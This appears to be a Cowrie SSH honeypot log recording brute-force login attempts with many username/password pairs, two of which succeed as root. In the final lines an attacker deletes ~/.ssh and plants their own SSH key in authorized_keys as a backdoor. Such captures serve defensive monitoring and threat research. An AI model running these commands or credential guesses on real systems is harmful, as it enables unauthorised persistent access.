{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:30:45.640815Z","src_ip":"212.227.235.229","session":"8bad50be6b24"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:30:47.018131Z","src_ip":"212.227.235.229","session":"8bad50be6b24"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:30:47.348425Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:30:47.353193Z","src_ip":"212.227.235.229","session":"8bad50be6b24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53094,"dst_ip":"1.2.3.4","dst_port":22,"session":"efa955682edc","protocol":"ssh","message":"New connection: 212.227.235.229:53094 (1.2.3.4:22) [session: efa955682edc]","sensor":"my-vps","timestamp":"2025-09-08T22:30:49.277253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:30:49.278048Z","src_ip":"212.227.235.229","session":"efa955682edc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:30:49.511947Z","src_ip":"212.227.235.229","session":"efa955682edc"}
{"eventid":"cowrie.login.failed","username":"info","password":"1234567","message":"login attempt [info/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T22:30:50.489019Z","src_ip":"212.227.235.229","session":"efa955682edc"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:30:51.725271Z","src_ip":"212.227.235.229","session":"efa955682edc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48668,"dst_ip":"1.2.3.4","dst_port":22,"session":"c21a0ae8c0bf","protocol":"ssh","message":"New connection: 212.227.235.229:48668 (1.2.3.4:22) [session: c21a0ae8c0bf]","sensor":"my-vps","timestamp":"2025-09-08T22:31:02.961325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:31:02.962311Z","src_ip":"212.227.235.229","session":"c21a0ae8c0bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:31:03.295580Z","src_ip":"212.227.235.229","session":"c21a0ae8c0bf"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:31:04.660182Z","src_ip":"212.227.235.229","session":"c21a0ae8c0bf"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:31:05.992198Z","src_ip":"212.227.235.229","session":"c21a0ae8c0bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43546,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7abc31cad58","protocol":"ssh","message":"New connection: 212.227.235.229:43546 (1.2.3.4:22) [session: d7abc31cad58]","sensor":"my-vps","timestamp":"2025-09-08T22:31:20.642766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:31:20.643750Z","src_ip":"212.227.235.229","session":"d7abc31cad58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:31:20.960090Z","src_ip":"212.227.235.229","session":"d7abc31cad58"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"root123456","message":"login attempt [ubuntu/root123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:31:22.265987Z","src_ip":"212.227.235.229","session":"d7abc31cad58"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:31:23.584731Z","src_ip":"212.227.235.229","session":"d7abc31cad58"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65440,"dst_ip":"1.2.3.4","dst_port":22,"session":"70f4849e1d1f","protocol":"ssh","message":"New connection: 217.72.205.35:65440 (1.2.3.4:22) [session: 70f4849e1d1f]","sensor":"my-vps","timestamp":"2025-09-08T22:31:32.444872Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:31:32.446075Z","src_ip":"217.72.205.35","session":"70f4849e1d1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56848,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7d84cfd9c66","protocol":"ssh","message":"New connection: 212.227.235.229:56848 (1.2.3.4:22) [session: c7d84cfd9c66]","sensor":"my-vps","timestamp":"2025-09-08T22:31:39.434560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:31:39.435264Z","src_ip":"212.227.235.229","session":"c7d84cfd9c66"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:31:39.759041Z","src_ip":"212.227.235.229","session":"c7d84cfd9c66"}
{"eventid":"cowrie.login.failed","username":"group1","password":"group1","message":"login attempt [group1/group1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:31:41.053825Z","src_ip":"212.227.235.229","session":"c7d84cfd9c66"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:31:42.370806Z","src_ip":"212.227.235.229","session":"c7d84cfd9c66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56406,"dst_ip":"1.2.3.4","dst_port":22,"session":"a729cd6d2833","protocol":"ssh","message":"New connection: 212.227.125.160:56406 (1.2.3.4:22) [session: a729cd6d2833]","sensor":"my-vps","timestamp":"2025-09-08T22:31:53.103074Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:31:53.104347Z","src_ip":"212.227.125.160","session":"a729cd6d2833"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54642,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7e4b3fafcee","protocol":"ssh","message":"New connection: 212.227.235.229:54642 (1.2.3.4:22) [session: b7e4b3fafcee]","sensor":"my-vps","timestamp":"2025-09-08T22:32:15.525355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:32:15.526378Z","src_ip":"212.227.235.229","session":"b7e4b3fafcee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:32:15.798764Z","src_ip":"212.227.235.229","session":"b7e4b3fafcee"}
{"eventid":"cowrie.login.failed","username":"ftpadmin","password":"1234567890","message":"login attempt [ftpadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T22:32:16.923946Z","src_ip":"212.227.235.229","session":"b7e4b3fafcee"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:32:18.197747Z","src_ip":"212.227.235.229","session":"b7e4b3fafcee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35596,"dst_ip":"1.2.3.4","dst_port":22,"session":"e206e9f5f0c3","protocol":"ssh","message":"New connection: 212.227.235.229:35596 (1.2.3.4:22) [session: e206e9f5f0c3]","sensor":"my-vps","timestamp":"2025-09-08T22:32:22.506249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:32:22.507257Z","src_ip":"212.227.235.229","session":"e206e9f5f0c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:32:22.842430Z","src_ip":"212.227.235.229","session":"e206e9f5f0c3"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123","message":"login attempt [developer/123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:32:24.219839Z","src_ip":"212.227.235.229","session":"e206e9f5f0c3"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:32:25.557738Z","src_ip":"212.227.235.229","session":"e206e9f5f0c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38384,"dst_ip":"1.2.3.4","dst_port":22,"session":"08793487ccf8","protocol":"ssh","message":"New connection: 212.227.235.229:38384 (1.2.3.4:22) [session: 08793487ccf8]","sensor":"my-vps","timestamp":"2025-09-08T22:32:43.192518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:32:43.193234Z","src_ip":"212.227.235.229","session":"08793487ccf8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:32:43.507420Z","src_ip":"212.227.235.229","session":"08793487ccf8"}
{"eventid":"cowrie.login.failed","username":"centos","password":"12345","message":"login attempt [centos/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:32:44.975212Z","src_ip":"212.227.235.229","session":"08793487ccf8"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:32:46.290871Z","src_ip":"212.227.235.229","session":"08793487ccf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34796,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3236cd1440d","protocol":"ssh","message":"New connection: 212.227.235.229:34796 (1.2.3.4:22) [session: f3236cd1440d]","sensor":"my-vps","timestamp":"2025-09-08T22:32:58.945047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:32:58.946654Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:32:59.259107Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz!qaz","message":"login attempt [root/1qaz!qaz] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:33:00.550236Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37192,"dst_ip":"1.2.3.4","dst_port":23,"session":"1e81b32430da","protocol":"telnet","message":"New connection: 212.227.125.160:37192 (1.2.3.4:23) [session: 1e81b32430da]","sensor":"my-vps","timestamp":"2025-09-08T22:33:00.726035Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:33:01.267556Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:33:01.268306Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:33:01.269343Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:33:01.582846Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:33:02.228181Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:33:02.228953Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
